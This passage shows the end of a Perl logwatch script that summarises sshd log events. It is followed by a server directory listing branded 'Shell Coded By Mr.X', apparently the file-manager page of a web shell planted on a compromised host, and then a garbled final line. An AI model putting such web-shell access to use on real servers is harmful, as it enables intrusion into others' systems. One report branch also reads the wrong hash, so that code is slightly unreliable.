      print "   $Reason";
      foreach my $Host (sort {$a cmp $b} keys %{$DisconnectReceived{$Reason}}) {
         $Total += $DisconnectReceived{$Reason}{$Host};
        if( $Detail > 0 ) {
            print "\n      $Host : $DisconnectReceived{$Reason}{$Host} Time(s)";
        }
      }
      if( $Detail > 0 ) {
         print "\n";
      } else {
         print " : $Total Time(s)\n";
      }
   }
}

if ($#Scanned >= 0) {
   print "\nScanned from:\n";
   foreach my $ThisOne (sort SortIP @Scanned) {
      print "   " . LookupIP($ThisOne) . "\n";
   }
}

if (keys %RefusedConnections) {
   my $output;
   foreach my $badguy (sort {$a cmp $b} keys %RefusedConnections ) {
      if ($RefusedConnectionsThreshold == 0 || $Detail > 5 || $RefusedConnections{$badguy} >= $RefusedConnectionsThreshold) {
        $output .= "      $badguy: " . $RefusedConnections{$badguy} . " Time(s)\n";
      }
   }
   if ($output ne '') {
     print "\nRefused incoming connections:\n";
     print $output;
   }
}

if (keys %PamReleaseFail) {
   print "\nCannot release PAM authentication:\n";
   foreach my $Error (sort {$a cmp $b} keys %PamReleaseFail) {
      print "   $Error : $PamReleaseFail{$Error} Time(s)\n";
   }
}

if (keys %ShadowInfo) {
   print "\nCould not get shadow information for:\n";
   foreach my $Error (sort {$a cmp $b} keys %ShadowInfo) {
      print "   $Error : $ShadowInfo{$Error} Time(s)\n";
   }
}

if (keys %PamError) {
   print "\nError in PAM authentication:\n";
   foreach my $Error (sort {$a cmp $b} keys %PamError) {
      print "   $Error : $PamError{$Error} Time(s)\n";
   }
}

if (keys %PamChroot) {
   print "\nPAM chroot:\n";
   foreach my $Reason (sort {$a cmp $b} keys %PamChroot) {
      print "   $Reason : $PamChroot{$Reason} Time(s)\n";
   }
}

if (keys %TTYModesFail) {
   print "\nSetting tty modes failed:\n";
   foreach my $Reason (sort {$a cmp $b} keys %TTYModesFail) {
      print "   $Reason : $TTYModesFail{$Reason} Time(s)\n";
   }
}

if ($sftpRequests > 0) {
   print "\nSFTP subsystem requests: $sftpRequests Time(s)\n";
}

if (keys %ChmodErr) {
  print "\nChmod errors:\n";
  foreach (keys %ChmodErr) {
    my ($File,$Perm,$Why)= split ",";
    print "   " . $File . " " . $Perm . " failed(" . $Why . "): ". $ChmodErr{"$File,$Perm,$Why"} . " Time(s)\n";
  }
}

if (keys %ChownErr) {
  print "\nChown errors:\n";
  foreach (keys %ChownErr) {
    my ($File,$From,$To,$Why)= split ",";
    print "   " . $File . " " . $From . " " .$To . " failed(" . $Why . "): ". $ChmodErr{"$File,$From,$To,$Why"} . " Time(s)\n";
  }
}

if ( ($Detail == 7 && keys %Krb_relm > 1) || ($Detail > 8 && keys %Krb_relm) ){
  print "\nSucessfull Kerberos Authentication from ",(scalar keys %Krb_relm)," relm:\n";
  foreach my $relm (keys %Krb_relm) { 
    if($Detail > 9){
      print "   ",$relm,":\n";
      foreach my $user(keys %{$Krb_relm{$relm}}){
        print "     ",$user,": ". $Krb_relm{$relm}{$user} . " Times(s)\n";
      }
    }else{
      print "   ",$relm,": ". (scalar keys %{$Krb_relm{$relm}}) . " User(s)\n";
    }
  }
}

if (keys %OtherList) {
   print "\n**Unmatched Entries**\n";
   print "$_ : $OtherList{$_} time(s)\n" foreach keys %OtherList;
}

exit(0);

# vi: shiftwidth=3 tabstop=3 syntax=perl et
# Local Variables:
# mode: perl
# perl-indent-level: 3
# indent-tabs-mode: nil
# End:

Filemanager

DIR : / usr/ share/ logwatch/ scripts/ services/
Name Type Size Permission Actions
afpd File 3.83 KB 0755
amavis File 176.36 KB 0755
arpwatch File 1.42 KB 0755
audit File 15.57 KB 0755
automount File 5.22 KB 0755
autorpm File 2.23 KB 0755
barracuda File 11.83 KB 0755
bfd File 2.18 KB 0755
cisco File 44.38 KB 0755
citadel File 58.56 KB 0755
clam-update File 6.92 KB 0755
clamav File 6.16 KB 0755
clamav-milter File 4.16 KB 0755
courier File 23.26 KB 0755
cron File 12.56 KB 0755
denyhosts File 1.73 KB 0755
dhcpd File 10.79 KB 0755
dirsrv File 4.83 KB 0755
dmeventd File 2.83 KB 0755
dnssec File 4.97 KB 0755
dovecot File 22.13 KB 0755
dpkg File 3.19 KB 0755
emerge File 4.42 KB 0755
evtapplication File 5.91 KB 0755
evtsecurity File 8.16 KB 0755
evtsystem File 12.72 KB 0755
exim File 24.78 KB 0755
eximstats File 1.9 KB 0755
extreme-networks File 10.9 KB 0755
fail2ban File 9.97 KB 0755
fetchmail File 3.51 KB 0755
freeradius File 10.2 KB 0755
ftpd-messages File 7.65 KB 0755
ftpd-xferlog File 6.17 KB 0755
http File 23.72 KB 0755
http-error File 4.93 KB 0755
identd File 5.52 KB 0755
imapd File 11.13 KB 0755
in.qpopper File 4.83 KB 0755
init File 3.46 KB 0755
ipop3d File 4.07 KB 0755
iptables File 14.94 KB 0755
kernel File 10.42 KB 0755
knockd File 2.78 KB 0755
lvm File 2.68 KB 0755
mailscanner File 27.14 KB 0755
mdadm File 4.57 KB 0755
mod_security2 File 7.81 KB 0755
modprobe File 4.15 KB 0755
mountd File 4.33 KB 0755
mysql File 4.5 KB 0755
mysql-mmm File 4.82 KB 0755
named File 31.24 KB 0755
netopia File 14.97 KB 0755
netscreen File 20.61 KB 0755
oidentd File 5.45 KB 0755
omsa File 2.57 KB 0755
openvpn File 13.67 KB 0755
pam File 1.85 KB 0755
pam_pwdb File 7.82 KB 0755
pam_unix File 16.02 KB 0755
php File 5.09 KB 0755
pix File 13.27 KB 0755
pluto File 11.96 KB 0755
pop3 File 15.17 KB 0755
portsentry File 4.98 KB 0755
postfix File 240.95 KB 0755
postgresql File 5.37 KB 0755
pound File 3.5 KB 0755
proftpd-messages File 10.58 KB 0755
puppet File 10.28 KB 0755
pureftpd File 8.15 KB 0755
qmail File 5.72 KB 0755
qmail-pop3d File 4.41 KB 0755
qmail-pop3ds File 3.96 KB 0755
qmail-send File 19.62 KB 0755
qmail-smtpd File 56.04 KB 0755
raid File 1.71 KB 0755
resolver File 3.42 KB 0755
rsyslogd File 1.79 KB 0755
rt314 File 4.42 KB 0755
samba File 25.62 KB 0755
saslauthd File 4.04 KB 0755
scsi File 3.32 KB 0755
secure File 40.97 KB 0755
sendmail File 92.25 KB 0755
sendmail-largeboxes File 2.5 KB 0755
shaperd File 5.62 KB 0755
slon File 4.6 KB 0755
smartd File 16.08 KB 0755
sonicwall File 24.98 KB 0755
spamassassin File 7.56 KB 0755
sshd File 30.95 KB 0755
sshd2 File 2.01 KB 0755
sssd File 2.44 KB 0755
stunnel File 5.61 KB 0755
sudo File 5.99 KB 0755
syslog-ng File 20.45 KB 0755
syslogd File 1.97 KB 0755
systemd File 7.42 KB 0755
tac_acc File 4.11 KB 0755
tivoli-smc File 4.41 KB 0755
up2date File 4.77 KB 0755
vdr File 8.28 KB 0755
vpopmail File 3.46 KB 0755
vsftpd File 8.26 KB 0755
windows File 16.1 KB 0755
xntpd File 8.58 KB 0755
yum File 2.79 KB 0755
zypp File 2.46 KB 0755
zz-disk_space File 5.98 KB 0755
zz-fortune File 1.67 KB 0755
zz-lm_sensors File 1.8 KB 0755
zz-network File 12.78 KB 0755
zz-runtime File 1.65 KB 0755
zz-sys File 3 KB 0755
zz-zfs File 5.89 KB 0755

Copyright reserved © 2026 xtooler.online Shell Coded By Mr.X

Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1